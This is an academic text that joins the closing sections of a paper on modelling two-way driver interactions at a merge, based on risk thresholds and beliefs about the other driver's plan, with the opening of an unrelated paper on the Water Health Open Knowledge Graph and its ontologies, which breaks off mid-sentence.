(i.e. higher risk thresholds) could be associated with more aggressive behaviour. ### Scenario D: Threshold sensitivity Scenario D investigates the sensitivity of the modelled drivers' behaviour to variations in the lower risk threshold. This scenario is the same as scenario C, with the only exception that the left driver has a slightly higher value for \(\rho_{l}\) (lower risk threshold). We, therefore, expect a very similar outcome in scenarios C and D. The only expected difference is that the left driver in scenario D re-plans more frequently because the risk for the new plan is constrained to the average of the two risk thresholds. With a smaller difference between \(\rho_{l}\) and \(\rho_{u}\), the absolute risk decrease at the re-plan points is smaller. This should cause the perceived risk to reach the upper threshold quicker and thus result in more frequent re-plan events. However, the model simulation results show major differences between scenarios C and D (Figures 6 & 7). As expected, the smaller difference between the left driver's low and high risk threshold resulted in more plan updates. But unexpectedly, this more frequent re-planing resulted in the left driver starting to accelerate and reaching the merge point first. To keep their perceived risk under control, the left driver deviated from their desired velocity to a larger extent than the right driver. This observation Figure 6: Model behaviour in scenario C. The right driver maintains their initial velocity longer. After briefly decelerating, they accelerate and reach the merge point first. For details of the notation, see the caption of Figure 4. can be explained by the fact that high velocities and accelerations do not contribute to risk. The left driver takes whatever action is needed to keep the probability of a collision below their threshold (in this case, high acceleration and high velocity). The slight change in risk thresholds and more frequent re-plans resulted in one of the re-plans initially failing. This triggered a change in the left driver's high-level strategy, they accelerated instead of braked, and this heavily influenced the outcome. ### Summary Scenarios C and D In scenario C, the driver with the higher risk thresholds (the right driver) passed the merge point first. This driver changed their plan at a later moment compared to the other driver. In terms of human behaviour, this can be explained as being more aggressive. The effect of slight changes to the lower threshold was shown to be substantial in scenario D. A small change resulted in a different interaction strategy, making the theoretically more "conservative" left driver arrive at the intersection first. This more conservative driver used high velocities and accelerations to lower their perceived risk even though high velocities would be interpreted by many human drivers as high-risk behaviour. The reason for this seemingly counter-intuitive model behaviour is that the high velocities and accelerations on their own do not contribute to the perceived Figure 7: Model behaviour in scenario D. The slight change in \(\rho_{l}\) for the left driver (in comparison to scenario C) resulted in a major change in high-level outcome. Instead of the right driver, the left driver now reaches the merge point first. For details of the notation, see the caption of Figure 4. risk of these modelled drivers. ### Emergent gap-keeping behaviour for car following Although the main focus of our model is on the interactive behaviour of the drivers when approaching the merging point, it also provides insight into their behaviour after the merging conflict is resolved. Specifically, in the four scenarios above, we found that the simulated drivers continued maintaining a gap on the straight section after the merge point. This behaviour was not explicitly programmed and the planner has no cost associated with short time or small distance gaps (a feature frequently used in human driver models [34, 35]). Instead, these distance gaps appear to emerge from the combination of risk perception and a probabilistic belief about the plan of the other driver. To further investigate this effect, we investigated a scenario without a merging point. In this scenario, the drivers drive behind each other on a straight stretch of road (\(400~{}m\)). We used the default parameters from Table 1, except for the velocity parameters. The leading vehicle has lower desired and initial velocities (\(9~{}m/s\)) compared to the following vehicle (\(10~{}m/s\)). Figure 8 shows that a steady-state gap emerges after approximately 100 meters. In this scenario, the leading driver mostly acts to reduce the risk and prevent a collision. Although the fact that the leading, not the following, driver mostly acts to maintain this gap is not uncommon for human drivers and has been observed under some conditions [36], it is not the most common behaviour for reducing the risk during car following [37]. We identified two causes for this model behaviour. First, the belief and risk perception in the model are purely symmetrical. There is no difference in risk between drivers that are in front or behind another, nor is there any difference in believed probability that a driver will accelerate or decelerate. In natural traffic this simplification will not hold, this should be accounted for when extending the model for use in those scenarios. Second, the risk thresholds of both drivers are equal in this example. It can be expected that in other situations, even under the previously mentioned assumption, the driver with the lower risk threshold will act to maintain the gap, as was seen in scenario C. This can be either the leading or the following driver, as was observed in human behavior [36, 37]. We investigated the effect of absolute velocities on the resulting steady-state distance gap, where we take the average gap over the final second of simulation as the steady-state gap. We simulated the model behaviour in this scenario for different velocities, every time with a \(10~{}\%\) velocity difference between the drivers, and an initial time gap of \(1~{}s\). We found that the emerging steady-state gap increased linearly with increasing velocities (Figure 9). This corresponds to human behaviour: the same linear relationship has been previously observed in a study on human gap-keeping behaviour on highways with low speeds [38]. Our model explains this relationship between velocity and distance gap as follows: The leading driver (orange) is unsure about the future plan of the following driver (blue). It could be possible that the blue driver will accelerate in the near future; In this case, a collision can occur. Because the orange driver keeps its risk below a threshold, it will keep a distance from the blue driver to make sure that its plan does not overlap too much with the possible future positions of the blue driver. Higher velocities, with the same maximum comfortable acceleration, result in a high standard deviation in the belief points. This causes the gap size to increase with velocity. The mentioned study [38] also showed that humans keep larger gaps (approximately 12 \(m\) to 23 \(m\) for the same velocity range) compared to our model. We, therefore, conclude that the model qualitatively captures the underlying risk-mitigation mechanism in human car-following behaviour, but needs to be further explored to investigate if fitting the model parameters to human data would also allow it to capture the magnitude of the gap characteristic of human drivers. Figure 8: Model behaviour in the straight road scenario. For details of the notation, see the caption of Figure 4. The bottom panel shows the gap between the vehicles as a function of the leading vehicle position. In this scenario, the blue (following) vehicle has a higher preferred velocity than the orange (leading) vehicle. The x-axes have been cropped to the first 200 meters of the 400 meter track. ## 5 Discussion In this work, we have proposed a modelling framework for two-way human-human interactions in traffic. We illustrated the utility of the framework by implementing a concrete model based on the framework, targeted at interactive behaviour in a simplified merging situation. We investigated the model's behaviour in four scenarios, one where the drivers are not on a collision course, one where they are, and two where we investigated the effects of the model parameters. The model captures the actions of two drivers who 1) successfully resolve merging conflicts without collisions, 2) increase safety margins that are clearly too small (a \(20~{}cm\) gap) for human drivers, and 3) exhibit individual conservative and aggressive behaviour, based on physically meaningful model parameters: their risk thresholds. In all scenarios, the model behaves in a plausible way that corresponds to intuitions about human interactive behaviour in merging conflicts. Furthermore, from the model's underlying principle (the notion of risk combined with the probabilistic belief about the other driver's plan) plausible behaviour emerged outside of the situations we developed and tuned the model for. Specifically, a realistic gap-keeping behaviour emerged, where the drivers keep larger distance gaps at higher velocities, as humans do [38]. This behaviour was observed even though no distance or time gap-related costs are incorporated in the model. These results show that the proposed model framework is a promising novel approach for modelling two-way multi-agent interactions in traffic. Modelling interactions in traffic has both practical and fundamental applications. In practice, a modelling framework like the one we propose could aid the development of autonomous vehicle controllers that aim to increase acceptability and safety in interactive scenarios. More fundamentally, such modelling, even when limited to an isolated traffic scenario, could contribute to gaining fundamental knowledge of human behaviour by highlighting the cognitive mechanisms humans use when interacting with each other. Our novel framework addresses the limitations of existing modelling Figure 9: Steady-state gap sizes (averaged over the last second) on a straight road where the following vehicle has a higher preferred velocity. The velocity difference between the vehicle is \(10\%\) and the initial time gap is \(1~{}s\). and control approaches, among which game-theoretic models and interaction-aware controllers, because it explicitly incorporates communication and two-way interaction. Furthermore, our model framework does not make strong assumptions about human behaviour, such as the assumption that humans are rational utility maximizers. We hope that the initial exploration of the model framework presented here can spark a new strain of interaction modelling research. ### Similar Approaches Among existing approaches to modelling traffic interactions, by far the most explored one is game theory. For example, for an extensive review of game-theory-based lane-changing models, see [39]. What is similar to our framework, is that game theory aims at modelling two-way interactions instead of modelling only one driver responding to another (for examples, see [14, 15, 16, 17, 13, 12]). What is different, is that our approach is not limited by two main assumptions (rationality, and lack of communication), and -for the majority of GT approaches- a focus on decision-making without describing operational behaviour. Finally, and more conceptually, game-theoretic models implicitly approach traffic interactions as a competition, while in our framework the agents have a joint primary objective (interaction safety) that makes the interaction a joint, cooperative effort. In contrast with game theory, our approach explicitly incorporates communication between drivers. Although there are similarities with game theory, for example, our case study uses the same modality of communication as many game theoretical approaches, position and velocity observations (e.g., [13, 40], for an overview, see [39]). There are two fundamental distinctions in how we approach communication with respect to game theory. First, the communication in our framework allows drivers to construct and update a belief about the other vehicle's plan without the need for any prior information about the other driver. This is a fundamental contradiction with game theory where players are assumed to know each other's utility functions (at least partially) beforehand. Therefore, in game theory, communication is not necessary because players can reason about what the other player is going to do to maximize their utility given the current state. The observations of position and velocity are only used to determine the state of the world. While in our model, position and velocity are used to convey information about the intention of other drivers. Second, in game theory, observations are not "remembered". They only serve to determine the current state, which is enough to reason about the other players' actions. Previous states are irrelevant. This is also known as the Markov condition or assumption. While in our work, the history of communication is kept in the belief about the other driver's intentions. Thus, the belief about a driver's future actions is based on its recent behaviour, not only on the current state. Some approaches combine game theory with an online estimation of the other player's utility function, thereby indirectly basing the belief about future actions (which directly depends on the utility function) on recent behaviour (e.g., [41, 35]). However, in these approaches, the conveyed information is not regarded as intentional communication. Furthermore, these approaches only estimate part (e.g., a single parameter) of the utility function online, the rest is assumed to be known a priori. Another modelling concept that bears resemblance to our approach is that of _Belief-Desire-Intent (BDI) modelling_. BDI modelling is based on the philosophical work of Bratman [31] and models single agents that have a belief, a desire (goal), and an intent (plan). Many implementations of BDI models have been proposed for different applications [42]. The BDI framework and our CEI framework share the concepts that agents construct a (probabilistic) belief about other agents and the world, and then make a plan based on that belief to reach a final goal. The BDI framework, however, was not indented to account for interactions. It is primarily a model framework for individual agents that perform individual tasks. It therefore also does not incorporate communication but instead updates its beliefs based on changes that occurred in the world. Finally, an important concept that can be complementary to the CEI-model framework, and bears resemblance to the BDI framework is the concept of _Theory of Mind (ToM)_[43] (for examples of applications to human-robot interaction, see [44, 45]). ToM is a psychological concept that assumes humans have an internal model of the beliefs, goals, and intentions of other humans in an interaction. Thereby, having the ability to reason about want other humans want, and how they will try to achieve that goal. This idea that humans understand the mechanisms behind the actions and beliefs of others could be used in an implementation of our proposed CEI-model framework, which, in principle, only requires humans to form a basic belief about the future movements of others. As an example, the implementation of the CEI-model in the case study assumes drivers predict where the other driver is going, not why they are doing that. A complete ToM model could extend this belief about future actions of the other, with beliefs about their beliefs and goals. Implementing a CEI-based model with an internal ToM model is an interesting avenue for future research. Besides these different types of modelling approaches, recently a great deal of effort was put into approaches for controlling (autonomous) vehicles in merging scenarios (e.g. [35, 41, 46]). Although the underlying techniques (such as finding a policy by optimizing some utility function) can be similar, the goal of these approaches is very different. While modelling approaches (such as ours) aim to best describe human behaviour. Control approaches aim to find a safe and optimal solution to a control problem. Game theory can therefore be very suitable for use in control approaches (as was done in [35, 41, 47]). Two recent works on modelling come close in scope to this work. In 2022, Markkula et al. proposed a modelling approach for individual agents in a driver-pedestrian interaction rather than multiple agents in a driver-driver interaction [48]. Using different versions of a model that incorporates a variety of concepts from psychology, with varying levels of complexity, they conclude that "modelling of human road user interaction is a formidable challenge". Similar to our work, their findings suggest that the problem cannot be solved with simple rational models. Besides that, accounting for specific, previously unexplained, phenomena observed in human interactive behaviour could only be done using complex cognitive models. These conclusions resonate with our argument that the development of new model frameworks that go beyond game theory and the assumption of one-way interaction is a necessary step to improve our understanding of human traffic interactions. Secondly, in 2014, Wan et al. also proposed an approach to model vehicle-vehicle interactions on merging ramps [49]. As in our work, they specifically address the influence vehicles have on each other. Their (and our) work, therefore, differs from traditional driver models that usually describe a single driver responding to - but not influencing - other traffic. Another similarity between our proposed framework and the work by Wan et al. is that we both explicitly consider communication between vehicles. However, the model proposed by Wan et al. specifically targets congested traffic and uses different mathematical models for vehicles that have different roles in the interaction (i.e., they determine who will lead, follow, and merge a priori). Wan et al. also do not consider individual differences between drivers. ### Framework Extensions Although we have only demonstrated our proposed model framework for a simple merging scenario with two vehicles, it could easily be extended to more vehicles or traffic interactions with other types of participants. The underlying reason is that while we put the model's bounding box around the complete interaction, the drivers within the model are strictly separated; the only component connecting the two drivers is communication (Figure 1). This has two main advantages. First, communication in our framework is based on observable signals (e.g., turn indicators or velocity). This means that sending and receiving communication can easily be shared between multiple drivers, i.e., the communication is broadcast to all surrounding road users rather than sent directly to one of them. For that reason, the model framework can be extended to any number of drivers without requiring a redesign. Second, because the drivers are separated, it is possible to swap one of the drivers in the model with another type of agent, for example, a pedestrian. This would require adding the agent type to the observed communication, but since this is also an observable feature, it would not make the model more complex. One could even go as far as replacing one of the agents in the model with a non-model agent altogether. This could, for example, be used to let a real human interact with the model in a driving simulator (this would require an optimized model implementation capable of running in real-time). This in turn would allow for the possibility of human drivers subjectively evaluating the ability of the model to describe natural interactions. Alternatively, a model could be used to evaluate autonomous vehicle controllers by letting the model interact with such a controller. Another potential extension useful for AV development is integrating the model into an AV controller to help it make decisions with an online evaluation of potential outcomes of an interaction. We believe our model could also be adapted to other types of human-human interaction tasks. An example of such a task is cooperative bottle reaching, for which a communication model was developed in [29]. The task in [29] is similar to our task in that it constitutes a joint effort for which communication and action take place along the same channel (velocity/acceleration in our case). The main difference between our model framework and the communication model in [29] is that we target the interaction dynamics, in which we assume communication plays an important role, instead of targeting to model the communication as a stand-alone feature. ### Limitations and Future Work Both the specific model implementation and the general modelling framework have important limitations. To start with the former, the model used for the simplified merging scenario uses very simplistic implementations for all components. The plan is based on desired velocity and acceleration alone. The beliefs are one-dimensional and assumed to be Gaussian distributions. The communication is assumed to be perfect (continuous without any noise), and only based on implicit cues. And finally, the risk is only based on collision avoidance, not influenced by high velocities or accelerations. In future implementations of the model, these limitations need to be addressed. However, it is important to first identify which of these limitations (if any) play a role in the model's ability to accurately reproduce human-human interactions. This could be done by comparing the model to data on human-human interactions gathered in a driving simulator experiment. Another limitation of the current model implementation lies in the updates of the belief function. The assumption that the likelihood function (used for the Bayesian updates) has a known and fixed standard deviation results in the fact that every update reduces the standard deviation of the posterior, even if the new information contradicts the current belief. This is counter-intuitive: contradicting information (incoming through communication) should increase the variability of the belief, not decrease it. Put differently, if another person or driver sends unclear communication about what they are going to do by alternating between accelerating and braking, one should keep all options open, not decrease the standard deviation of the predicted position after a couple of seconds while shifting the mean around on every time step. How to properly address this limitation remains an open question. Finally, the model's satisficing-based decision-making can result in unstable outcomes for high-conflict scenarios. When re-planning, the drivers in the model will first search for a new solution close to the previous solution. For example, if the previous plan was to brake, the driver will first explore if braking harder will satisfy the new constraint. Only if this optimization fails, the driver will explore other strategies (i.e., acceleration) to lower the perceived risk. This drastic change in high-level behaviour is thus triggered by the first optimization failing. Therefore, slight numerical or temporal differences in this optimization can lead to different high-level outcomes, especially for situations that are highly symmetrical (e.g., when drivers have very similar parameters and none of the vehicles has a clear kinematic advantage). This was already observed in scenario D, where a slight change in model parameters caused a different outcome, but a similar outcome change could also result from changes in the type of numerical optimization solver or its parameters. One way of addressing this sensitivity is to make the model stochastic: introducing variability in the model's behaviour will make the outcome in high-conflict scenarios inherently stochastic and therefore could help to make it less sensitive to small external perturbations. Adding stochasticity also addresses the main limitation of the overall framework, which is that currently, the framework is fully deterministic: with the exact same parameters (for model and solver), the model will always produce the same behaviour. This is inconsistent with the substantial behavioural variability that humans exhibit in traffic [50]. We see multiple possible ways of introducing stochasticity in the framework to account for this. To name two: adding stochasticity could be done in the receiving of communication (translating perceptual information to an updated belief) by using evidence accumulation mechanisms [10] or additive noise, or by including noise directly in the risk perception. However, more work is needed to determine the best approach. A second limitation of the overall framework concerns improvements and redesigns of the model. Although the different components in the framework are separated, which should allow for easy redesign of parts of the model, they do depend on each other. This could mean that when redesigning one aspect of the model, a redesign of another aspect is inevitable. As an example, in the case study, we used velocity and position as the means of communication. These values are directly used in the belief update. However, if we would change the communication component of the model, the belief and its update also need to be changed. This is an important consideration when starting a redesign of the model since this could be the case for more components. Finally, event-based triggering of the re-plan based on perceived risk results in an uneven computational requirement from the model: some time steps may take significantly more time to compute than others. A result of this is that our current implementation of the model cannot run in real-time. Instead, we used offline simulation for the case study. This could pose a problem when an experiment needs to be performed where the model interacts directly with a human. Although the presented case study shows promising results, there is much future work to be done on the proposed framework. In addition to accounting for stochasticity in human behaviour and optimizing the runtime performance of the model, a necessary next step is to compare the model to human-human interactive behaviour. However, even validating single-driver models that do not incorporate interactions is already a complex task [51], therefore comparing our model to human-human interaction data requires a separate detailed investigation. ## 6 Conclusion In this paper, we proposed a novel modelling framework to model human-human driving interactions. The key insight underlying this framework is the focus on the joint behaviour of the drivers during the interaction, rather than the isolated behaviour of a single driver. The framework explicitly includes communication between drivers and mutual influences (two-way interaction). We implemented the model for a simplified merging scenario and investigated its behaviour in four scenarios. We conclude the following: * The model avoids impending collisions via plausible driver-driver interactive behaviours; * Changing the risk threshold parameters per driver results in changes in behaviour that can be interpreted as more aggressive or conservative; * Velocity-depended gap-keeping behaviour emerges from the combination of risk-based planning and a probabilistic belief about other drivers' plans. With this behaviour, the model shows a fundamental aspect of human driving behaviour, without it being explicitly programmed; * The proposed model framework is a promising novel approach for modelling two-way multi-agent interactions in traffic. ## Acknowledgement The authors thank Nissan Motor Co. Ltd. for funding this work.
2305.11051
The Water Health Open Knowledge Graph
Recently, an increasing interest in the management of water and health resources has been recorded. This interest is fed by the global sustainability challenges posed to the humanity that have water scarcity and quality at their core. Thus, the availability of effective, meaningful and open data is crucial to address those issues in the broader context of the Sustainable Development Goals of clean water and sanitation as targeted by the United Nations. In this paper, we present the Water Health Open Knowledge Graph (WHOW-KG) along with its design methodology and analysis on impact. WHOW-KG is a semantic knowledge graph that models data on water consumption, pollution, infectious disease rates and drug distribution. The WHOW-KG is developed in the context of the EU-funded WHOW (Water Health Open Knowledge) project and aims at supporting a wide range of applications: from knowledge discovery to decision-making, making it a valuable resource for researchers, policymakers, and practitioners in the water and health domains. The WHOW-KG consists of a network of five ontologies and related linked open data, modelled according to those ontologies.
Gianluca Carletti, Elio Giulianelli, Anna Sofia Lippolis, Giorgia Lodi, Andrea Giovanni Nuzzolese, Marco Picone, Giulio Settanta
2023-05-18T15:43:00Z
http://arxiv.org/abs/2305.11051v1
# The Water Health Open Knowledge Graph ###### Abstract Recently, an increasing interest in the management of water and health resources has been recorded. This interest is fed by the global sustainability challenges posed to the humanity that have water scarcity and quality at their core. Thus, the availability of effective, meaningful and open data is crucial to address those issues in the broader context of the Sustainable Development Goals of clean water and sanitation as targeted by the United Nations. In this paper, we present the Water Health Open Knowledge Graph (WHOW-KG) along with its design methodology and analysis on impact. WHOW-KG is a semantic knowledge graph that models data on water consumption, pollution, infectious disease rates and drug distribution. The WHOW-KG is developed in the context of the EU-funded WHOW (Water Health Open Knowledge) project and aims at supporting a wide range of applications: from knowledge discovery to decision-making, making it a valuable resource for researchers, policymakers, and practitioners in the water and health domains. The WHOW-KG consists of a network of five ontologies and related linked open data, modelled according to those ontologies. Keywords:Knowledge Graph Semantic Web Liked Open Data Water Quality Health Environmental Data Clean Water and Sanitation ## 1 Introduction Interest in water and sanitation management has grown in recent years driven by global sustainability challenges that prioritise, among the others, clean water and sanitation, as outlined in the UN Sustainable Development Goals5. To provide effective responses to these global issues, the availability of high quality and open data becomes an essential requirement. However, the heterogeneity and complexity of water and health data, when available, can pose significant challenges. Not only data is heterogeneous both in format and in semantics, but mostly it does not guarantee FAIR at any level: it is not findable, thus it is not accessible nor interoperable. There may also be no licenses specified for enabling a direct reuse of the data. In response, only a few ontological modelling solutions have emerged to represent this fragmented knowledge within a FAIR framework, aiming to cater to the need for coverage of heterogeneous datasets in the international landscape. This paper introduces the Water Health Open Knowledge Graph (WHOWG-KG), which is the first European open distributed knowledge graph aimed at linking, using a common semantics, data on water consumption and quality with health parameters (e.g., infectious diseases rates, general health conditions of the population). Designed to understand the impact of water-related climate events, water quality, and water consumption on health, it provides a harmonized data layer that can be re-used for analysis, research, and development of innovative services and applications. The project's primary driver was to establish a sustainable methodology for open knowledge graph production to ensure authoritativeness, timeliness, semantic accuracy, and consistency data quality characteristics, as well as metadata compliance with the European DCAT-AP profile6 and related national and thematic extensions. Footnote 6: [https://joinup.ec.europa.eu/collection/semantic-interoperability-community-semic/solution/dcat-application-profile-data-portals-europe/release/11](https://joinup.ec.europa.eu/collection/semantic-interoperability-community-semic/solution/dcat-application-profile-data-portals-europe/release/11). The WHOW-KG is still under development and currently consists of more than 100 millions triples from 19 selected datasets according to three use cases. The WHOW-KG is distributed and it is available via three SPARQL endpoints: two endpoints available from two data providers (Lombardy Region and Italian National Institute of Environmental Research (ISPRRA)) and one endpoint from the Institute of Cognitive Sciences and Technologies of CNR (ISTC-CNR). All the resources from Lombardy Region are licensed under the Creative Commons Public Domain License (CC0) and the ones from ISPRA under the Creative Commons Attribution 4.0 International (CC-BY 4.0) license. In summary, this paper presents the following contributions: * The WHOW-KG and an analysis of both its impact and its impact results. * A design methodology to support data providers' publication of Linked Open Data that is highly extensible and sustainable. * An analysis of the five WHOW ontologies, including a review of the state of the art in terms similar works in both domains water and health. The rest of the paper is organized as follows: (i) Section 2 discusses the design methodology; (ii) Section 3 addresses the results achieved in terms of the ontology network and produced Linked Open Data; (iii) Section 4 discusses the impact of the WHOW-KG; (iv) Section 5 presents the related work; finally, (v) Section 6 concludes the paper, discusses the limitations, and defines future directions of research. ## 2 Material and method The WHOW-KG was developed to cope with three selected use cases identified in the context of the WHOW project with domain experts and data providers. Those use cases are: (i) Contaminants in marine waters (UC1), (ii) Water quality and for human consumption (UC2), and (iii) Meteorological extreme events (UC3). The first use case, i.e. Contaminants in marine waters, aims at modelling ontologies and creating linked open data on human exposure to chemicals and biological contaminants in marine waters, ingestion of contaminated fish products, and airborne exposure, such as Ostreopsis Ovata7. The second use case, i.e. Water quality and for human consumption, focuses on generating ontologies and linked open data for modelling and representing quality of surface and ground waters as well as drinking water quality parameters and values, measured by compliance with the EU Directive 2020/21848 on the quality of water intended for human consumption. Finally, the third use, i.e., Meteorological Extreme events, is about modelling ontologies and linked open data for representing meteorological phenomena, alteration of the hydrological cycle and agriculture industries. More details about the use cases can be found by interested readers in a public deliverable [16] of the project. Footnote 7: Ostreopsis Ovata is a well known genus of free-living dinoflagellates found in marine environments that is frequently associated with phenomena of human intoxication. Footnote 8: [https://eur-lex.europa.eu/eli/dir/2020/2184/oj](https://eur-lex.europa.eu/eli/dir/2020/2184/oj). ### Material The aforementioned use cases were defined along with the identification of pertinent core open datasets by means of a co-creation programme organised within the scope of the WHOW project. Hence, 77 participants actively contributed to the programme. The group of co-creators included domain experts, stakeholders, practitioners, and data providers from both public and private organisations located in the EU. The full list of datasets identified can be consulted in a corresponding project deliverable [3]. From this list, we selected high-priority datasets that are currently used for designing and generating the WHOW-KG. The selection was done in compliance with to the following criteria: (i) relevance to the use cases; (ii) open licence associated with the dataset; and (iii) data availability for the years spanning mainly from 2018 to 2021. For some datasets, the time period is even longer starting from 1999 to 2023. In general, time span of reference 2018-2021 is a requirement defined in the project and contributors of the co-creation programme. The identified datasets are reported in Table 1 with an identifier, short description, data format, right holder, supported use case, and number of records. By number of records we mean the number of rows and triples for CSV and RDF data sources, respectively. ### Method The methodology we used for constructing the WHOW-KG is inspired by the one defined in [6] and relies on eXtreme Design [2] (XD) for ontology modelling. XD emphasises the reuse of ontology design patterns [12] (ODPs) into an iterative and incremental process. More interestingly, XD is a collaborative methodology that fosters the cooperation among multiple actors with different roles (e.g. knowledge engineers, domain experts, etc.) to make sure all the modelling requirements are first captured and then effectively covered. Hence, we opted for \begin{table} \begin{tabular}{l c c c c} \hline \hline **ID Description** & **Format Right holder** & **Use Case \# of records** \\ \hline D19 Analytical data of river & CSV & ARPA Lombardia & UC2 & 1 060 320 \\ water bodies, including & & & & \\ D210Analytical data of lake & CSV & ARPA Lombardia & UC2 & 136 085 \\ water bodies & & & & \\ D31Analytical data of groundwater & & CSV & ARPA Lombardia & UC2 & 591 389 \\ D41Height of the lakes & CSV & ARPA Lombardia & UC2 & 5480 \\ D51Infectious diseases rates & CSV & Regione Lombardia & UC2 & 11 435 \\ by sex and age & & & & \\ D61OutputStreopsis ovata & CSV & ISPRA & UC1 & 1,222 \\ D71Repertory of mitigation & RDF & ISPRA & UC3 & 1 286 758 \\ measures for National & & & & \\ D81OutputSoil consumption indicators & RDF & ISPRA & UC3 & 1 625 802 \\ D91Meteo observations and weather stations (for october 2019 of 8 geographical Lombary areas) & & & & \\ \hline \hline \end{tabular} \end{table} Table 1: Datesets selected for the creation of the WHOW-KG. XD since it fits our collaborative setting based on the co-creation programme. Furthermore, there is evidence il literature [1] that the reuse of ODPs (i) speeds up the ontology design process, (ii) eases design choices, (iii) produces more effective results in terms of ontology quality, and (iv) boosts interoperability. Figure 1 shows the methodology implemented for constructing the WHOW-KG. Ontology designIn such a figure, the activities named _requirement collection_, _test design_, _ontology module development_, and _ontology testing_ come from XD and focus on ontology design. The requirement collection activity aims at eliciting the requirements as _competency questions_[13] (CQs). CQs are natural language questions conveying the ontological commitment expected from a knowledge graph (KG) and drive both ontology modelling and validation. In fact, on the one hand CQs are a means for ontology development. On the other, they can be converted to formal queries in order to assess the effectiveness of the resulting KG to cope with the requirements. We implemented the validation into the _ontology testing_ activity. This was done by converting defined CQs into SPARQL and executing the latter as unit tests with toy data following the solution defined in [4]. The ontology development we applied is modular (cf. activity named ontology module development) allowing us to generate a set of networked ontologies. Each ontology of the network is a separate module designed with the purpose of minimising coupling with other ontology modules and maximising the internal cohesion of its conceptualisation. The re-use of external ontologies and ODPs was done by applying both the direct and indirect approach [17; 5]. Direct re-use is about embedding individual entities or importing implementations of ODPs or other ontologies in the network, thus making it highly dependent on them. Instead, indirect re-use is about applying relevant entities and patterns from external ontologies as templates, by reproducing them in the ontologies Figure 1: Methodology implemented for constructing the WHOW-KG. of the network and providing possible extensions. We opted for direct re-use in case of widely adopted vocabularies, such as SKOS, the Time ontology available in the Italian national catalog of semantic assets for public administrations18, aligned with the W3C time ontology, and the top-level19 (TOP) and environmental monitoring facilities20 (EMF) ontologies of the Linked ISPRA project21. TOP is used as a top-level ontology that provides general concepts and relations, whilst EMF provides core domain concepts and relations for modelling environmental monitoring data. On the contrary, we opted for the indirect approach for re-using patterns and to support interoperability with other pertinent ontologies, e.g. SSN/SOSA22[14]. The latter case was realised by means of alignments axioms, such as rdfs:subClassOf and owl:equivalentClass in dedicated alignment ontologies. Footnote 18: [https://schema.gov.it](https://schema.gov.it) Footnote 19: [https://github.com/whow-project/semantic-assets/blob/main/ispara-ontology-network/top/latest/top.rdf](https://github.com/whow-project/semantic-assets/blob/main/ispara-ontology-network/top/latest/top.rdf). Footnote 20: [https://github.com/whow-project/semantic-assets/blob/main/ispara-ontology-network/inspire-mf/latest/inspire-mf.rdf](https://github.com/whow-project/semantic-assets/blob/main/ispara-ontology-network/inspire-mf/latest/inspire-mf.rdf). Footnote 21: [https://dati.ispmbiente.it/](https://dati.ispmbiente.it/) Footnote 22: [https://www.w3.org/TR/vocab-ssn/](https://www.w3.org/TR/vocab-ssn/). Footnote 23: [https://rml.io/specs/rml/](https://rml.io/specs/rml/). Footnote 24: [https://www.w3.org/TR/r2rml/](https://www.w3.org/TR/r2rml/). Footnote 25: [https://github.com/whow-project/datasets](https://github.com/whow-project/datasets). Footnote 26: [https://github.com/RMLio/rmlmapper-java](https://github.com/RMLio/rmlmapper-java) Footnote 27: [https://github.com/anuzzolese/pyrml/](https://github.com/anuzzolese/pyrml/). Linked Open Data productionOnce the ontology network is modelled the next steps in the methodology aims at populating the KG with Linked Open Data (LOD) gathered from the identified input data sources (cf. Table 1). The LOD production was performed by means of declarative mappings. Hence, in the activity _mapping development_ we defined those mappings by means of the RDF Mapping Language23[10] (RML), which extends the W3C-standardised mapping language R2RML24 for mapping to RDF kind of structured data source. All the RML mapping rules defined are available on the project's GitHub repository25. These mappings were processed with both RMLMapper26 and pyRML27. The latter is a lightweight Python engine for processing RML files designed and implemented in the context of the project. Data validation was then performed by using the same SPARQL unit tests derived from CQs. We point that in the latter case the unit tests were executed on real data. The activities related to data production are meant to be executed in a decentralised and distributed fashion in which different data providers might use their data and RML mapping rules independently. ## 3 Results ### Ontology Network The WHOW ontology network consists of 8 ontology modules. In Figure 2 each ontology is represented as a circle, whilst the arrows represent owl::imports axioms among the ontologies. The ontologies represented as white circles are external ontologies we re-used with the direct approach. The ontologies represented as gray circles are the novel contributions. The base namespace defined novel ontologies is [https://w3id.org/italia/whow/onto/](https://w3id.org/italia/whow/onto/). From this base namespace each module defines its local namespace following the table of prefixes reported in Figure 2. Table 2 reports core metrics about the ontology network, which is: (i) under version control on GitHub28; (ii) shared on Zenodo29 with a CC-BY 4.0 International licence; and (iii) findable on Linked Open Vocabularies30. Footnote 28: [https://github.com/whow-project/semantic-assets/tree/main/ontologies](https://github.com/whow-project/semantic-assets/tree/main/ontologies). Footnote 29: [https://doi.org/10.5281/zenodo.7916179](https://doi.org/10.5281/zenodo.7916179). Footnote 30: [https://lov.linkeddata.es/dataset/lov/](https://lov.linkeddata.es/dataset/lov/). this ontology we reused the PartOf ODP33 for expressing parthood between water basins (cf. the object property hydro:isSubWaterBasin). Footnote 33: [http://ontologydesignpatterns.org/wiki/Submissions:PartOf](http://ontologydesignpatterns.org/wiki/Submissions:PartOf). Water Monitoring module.The _Water Monitoring_ ontology is identified by the prefix w-mon:34. It provides means to represent observations related to Figure 3: The Hydrography ontology. Figure 2: The WHOW ontology network. the quality of water courses, such as chemical and biological substances found in water bodies. The requirements for the representation of water observations are defined according to the data provided by the data providers involved in the project and the standards and directives in terms of observations and water-related assessments. For what concerns the representation of water observations, it is possible to refer to European directives: (i) those deriving from taxonomies from European Directive 98/83/CE (and subsequent ones)35, confirmed by the Italian Ministry of Health36, concerning parameters of the waters for human consumption, and (ii) those deriving from the European Directive 2009/90/EC37, concerning parameters of surface waters. Thus, water quality monitoring requires the integration of heterogeneous types of both observations and observation objects derived from samplers. As a result, in the ontology (cf. Figure 4), a w-mon:WaterObservation is divided into w-mon:DrinkingWaterObservation, w-mon:SurfaceOrGroundWaterObservation, and w-mon:RadioActivityObservation, which are, in turn, further divided into subclasses based on the specific parameter being observed. In fact, the observations that have as an object a microbiological agent or a chemical substance, monitor it through its concentration in the water. On the contrary, observations on properties of water, such as hardness, density or pH, do not imply the presence of an object being observed since no chemical substance or microbiological agent is implied there. The ontology follows the Stimulus-Sensor-Observation Ontology Design Pattern (SSO ODP) [15], which is a standard for the Infrastructure for Spatial Information in Europe [8], and the Specimen model of ISO 19156:201138, which outlines the properties of sampling process features. Footnote 35: [https://eur-lex.europa.eu/legal-content/EN/ALL/?uri=CELEX:31998L0083](https://eur-lex.europa.eu/legal-content/EN/ALL/?uri=CELEX:31998L0083). Footnote 36: Water quality parameters published by Italian 